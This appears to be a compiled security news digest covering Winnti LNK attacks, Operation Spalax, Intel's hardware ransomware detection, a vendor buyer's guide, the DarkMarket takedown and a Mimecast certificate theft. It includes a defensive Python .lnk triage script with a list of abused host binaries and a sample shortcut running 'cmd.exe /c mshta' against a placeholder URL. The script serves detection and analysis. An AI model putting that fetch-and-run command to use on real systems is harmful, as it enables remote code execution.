Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks

Cybersecurity researchers have disclosed a series of attacks by a threat actor of Chinese origin that has targeted organizations in Russia and Hong Kong with malware — including a previously undocumented backdoor.

Attributing the campaign to Winnti (also tracked as APT41), Positive Technologies dated the first attack to May 12, 2020, when the group used LNK shortcuts to extract and run the malware payload. A second attack, detected on May 30, used a malicious RAR archive containing shortcuts to two decoy PDF documents purporting to be a curriculum vitae and an IELTS certificate.

The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers, which are used to fetch the final-stage malware: a shellcode loader (“svchast.exe”, named to resemble the legitimate svchost.exe) and a backdoor called Crosswalk (“3t54dE3r.tmp”).
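Shortcuts like these carry their target path and command line inside the Windows Shell Link binary format, so a first triage step is to pull those strings out without ever double-clicking the file. The Python below is an added example, not code from the original article or from Positive Technologies: it parses the MS-SHLLINK header and StringData fields and flags a shortcut whose command line references a URL or a common download/execute host binary. The sample shortcut it builds, and the URL inside it, are constructed placeholders rather than indicators from the campaign, and the cp1252 code page used for non-Unicode strings is an assumption.

```python
"""Triage Windows shortcut (.lnk, MS-SHLLINK) files for remote-fetch behaviour.

Added example; not code from the original article or from Positive
Technologies. It parses the Shell Link structure far enough to recover
the StringData fields (name, relative path, working directory,
command-line arguments, icon location) and flags shortcuts whose command
line references a URL or a common download/execute host binary. The
sample shortcut at the bottom is constructed in memory for the demo and
its URL is a placeholder, not an indicator from the campaign.
"""
import re
import struct

HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields in the order they appear in the file.
STRING_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

# Host binaries commonly abused to fetch or run a remote payload from a shortcut.
SUSPICIOUS_HOSTS = ("mshta", "powershell", "cmd", "rundll32", "certutil",
                    "wscript", "cscript", "bitsadmin", "curl")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link as a dict of str."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        # IDListSize (2 bytes) is followed by IDListSize bytes of item IDs.
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        # LinkInfoSize (4 bytes) counts the whole LinkInfo structure, itself included.
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        # ANSI strings use the system code page; cp1252 is assumed here.
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


def triage_lnk(data: bytes) -> dict:
    """Flag a shortcut whose target or arguments fetch or run something remote."""
    fields = parse_lnk(data)
    cmdline = f"{fields.get('relative_path', '')} {fields.get('arguments', '')}"
    urls = URL_RE.findall(cmdline)
    hosts = [h for h in SUSPICIOUS_HOSTS
             if re.search(rf"\b{h}(\.exe)?\b", cmdline, re.IGNORECASE)]
    return {"fields": fields, "urls": urls, "suspicious_hosts": hosts,
            "suspicious": bool(urls or hosts)}


def build_lnk(relative_path: str, arguments: str = "", working_dir: str = "") -> bytes:
    """Build a minimal Unicode Shell Link (no IDList or LinkInfo) for testing."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    if working_dir:
        flags |= HAS_WORKING_DIR
    if arguments:
        flags |= HAS_ARGUMENTS
    # HeaderSize, CLSID, flags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1..3.
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for text, bit in ((relative_path, HAS_RELATIVE_PATH),
                      (working_dir, HAS_WORKING_DIR),
                      (arguments, HAS_ARGUMENTS)):
        if flags & bit:
            encoded = text.encode("utf-16-le")
            body += struct.pack("<H", len(encoded) // 2) + encoded
    return header + body


# Constructed sample: a shortcut that launches mshta against a placeholder URL.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                       "/c mshta https://example.invalid/landing.hta")

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

Real shortcuts from a mail gateway will usually carry an IDList and LinkInfo block in front of the strings; the parser skips both by their size fields, so `triage_lnk(open(path, "rb").read())` works on those as well. The URL and host-binary checks are deliberately simple and meant as a first filter, not a verdict.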

Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor capable of carrying out system reconnaissance and receiving additional modules from an attacker-controlled server as shellcode.

While this modus operandi shares similarities with that of the Korean threat group Higaisa — which was found in 2020 using LNK files attached to emails to launch attacks on unsuspecting victims — the researchers said the use of Crosswalk points to Winnti's involvement.

Experts Uncover Malware Attacks Against Colombian Government and Companies

Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries.

In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed “Operation Spalax” — began in 2020, with a modus operandi that shares some similarities with an APT group that has targeted the country since at least April 2018 but also differs from it in other ways.

The overlaps take the form of phishing emails that use similar topics and impersonate some of the same entities as a February 2019 operation disclosed by QiAnXin researchers, as well as subdomain names used for command-and-control (C2) servers.

However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped.

The attack chain begins with the targets receiving phishing emails that lead to the download of malicious files: RAR archives hosted on OneDrive or MediaFire containing various droppers responsible for decrypting and running RATs such as Remcos, njRAT, and AsyncRAT on the victimized computer.

Intel Adds Hardware-Enabled Ransomware Detection to 11th Gen vPro Chips

Intel and Cybereason have partnered to build anti-ransomware defences into the chipmaker’s newly announced 11th generation Core vPro business-class processors.

The hardware-based security enhancements are baked into Intel’s vPro platform via its Hardware Shield and Threat Detection Technology (TDT), enabling profiling and detection of ransomware and other threats that leave a footprint in CPU performance.

“The joint solution represents the first instance where PC hardware plays a direct role in ransomware defences to better protect enterprise endpoints from costly attacks,” Cybereason said.

Exclusive to vPro, Intel Hardware Shield protects against firmware-level attacks targeting the BIOS, helping ensure that the operating system (OS) runs on legitimate hardware, and reduces the risk of malicious code injection by locking down memory in the BIOS while software is running, so that planted malware has a harder time compromising the OS.

Intel TDT, on the other hand, combines CPU telemetry data with machine learning-based heuristics to identify anomalous attack behaviour — including polymorphic malware, fileless scripts, crypto mining, and ransomware infections — in real time.

Buyer’s Guide for Securing Internal Environment with a Small Cybersecurity Team

Ensuring the cybersecurity of your internal environment when you have a small security team is challenging. If you want to maintain the highest security level with a small team, your strategy has to be ‘do more with less,’ and with the right technology, you can leverage your team and protect your internal environment from breaches.

The “Buyer’s guide for securing the internal environment with a small cybersecurity team” includes a checklist of the most important things to consider when creating or re-evaluating the cybersecurity of your internal environment, to ensure your team has it all covered.

The buyer’s guide is designed to help you choose the solution that will ensure you get complete visibility, accurately detect and mitigate threats, and make the most of your existing resources and skills. There are three key aspects that stand out when looking for the best way to protect your internal environment with a small team—visibility, automation, and ease of use.

If you can’t see it, you can’t keep it secure

With the attack surface continually growing and your endpoints and employees being spread across multiple locations, visibility of your entire internal environment is critical for its protection. How do you ensure visibility?

1. Asset discovery – make sure you know about all your endpoints so that you can keep them monitored and updated.

2. Advanced endpoint security – ‘understand’ the endpoint’s behavior in order to detect anomalies and stealthy attacks.

3. Natively integrated advanced technologies, including NGAV, EDR, NTA/NDR, UEBA, and deception technology, to ensure coverage and timely detection.

Authorities Take Down World’s Largest Illegal Dark Web Marketplace

Europol on Tuesday said it shut down DarkMarket, the world’s largest online marketplace for illicit goods, as part of an international operation involving Germany, Australia, Denmark, Moldova, Ukraine, the U.K.’s National Crime Agency (NCA), and the U.S. Federal Bureau of Investigation (FBI).

At the time of closure, DarkMarket is believed to have had 500,000 users and more than 2,400 vendors, with over 320,000 transactions resulting in the transfer of more than 4,650 bitcoin and 12,800 monero, totalling roughly €140 million ($170 million).

The illegal internet market specialized in the sales of drugs, counterfeit money, stolen or forged credit card information, anonymous SIM cards, and off-the-shelf malware.

The months-long intelligence operation also resulted in the arrest over the weekend, near the German-Danish border, of a 34-year-old Australian national alleged to be the mastermind behind DarkMarket.

According to The Guardian, DarkMarket came to light in the course of a major investigation against the web hosting service CyberBunker, which served as the web host for The Pirate Bay and WikiLeaks in the past.

Hackers Steal Mimecast Certificate Used to Securely Connect with Microsoft 365

Mimecast said on Tuesday that “a sophisticated threat actor” had compromised a digital certificate it provided to certain customers to securely connect its products to Microsoft 365 (M365) Exchange.

The discovery was made after Microsoft notified it of the breach, the London-based company said in an alert posted on its website, adding that it has reached out to the impacted organizations to remediate the issue.

The company didn’t elaborate on what type of certificate was compromised, but Mimecast offers seven different digital certificates, selected by geographical region, which must be uploaded to M365 to create a server connection in Mimecast.

“Approximately 10 percent of our customers use this connection,” the company said. “Of those that do, there are indications that a low single digit number of our customers’ M365 tenants were targeted.”

Mimecast is a cloud-based email management service for Microsoft Exchange and Microsoft Office 365 that offers users an email security and continuity platform to safeguard them from spam, malware, phishing, and targeted attacks.
